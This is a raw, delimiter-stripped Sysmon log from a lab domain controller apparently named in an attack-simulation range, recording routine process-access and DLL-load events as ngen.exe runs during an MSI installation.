14:57:23.983{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.983{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.983{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.952{A7A01FEF-EBD3-607E-8F0C-00000000BB01}8726176C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.952{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8F0C-00000000BB01}872C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.936{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.936{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-8E0C-00000000BB01}6888c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.936{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.936{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.936{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.921{A7A01FEF-EBD3-607E-8D0C-00000000BB01}29402036C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.905{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8D0C-00000000BB01}2940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.905{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-8C0C-00000000BB01}5660c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.889{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.889{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.889{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.874{A7A01FEF-EBD3-607E-8B0C-00000000BB01}69646948C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.874{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8B0C-00000000BB01}6964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.858{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.858{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-8A0C-00000000BB01}5332c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.843{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-880C-00000000BB01}4776c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.843{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-880C-00000000BB01}4776c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.843{A7A01FEF-EBD3-607E-880C-00000000BB01}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.827{A7A01FEF-EBD3-607E-890C-00000000BB01}66963076C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-880C-00000000BB01}4776c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.827{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-890C-00000000BB01}6696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.827{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-880C-00000000BB01}4776c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.811{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-880C-00000000BB01}4776c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.811{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-860C-00000000BB01}2508c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.811{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-860C-00000000BB01}2508c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.811{A7A01FEF-EBD3-607E-860C-00000000BB01}2508C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 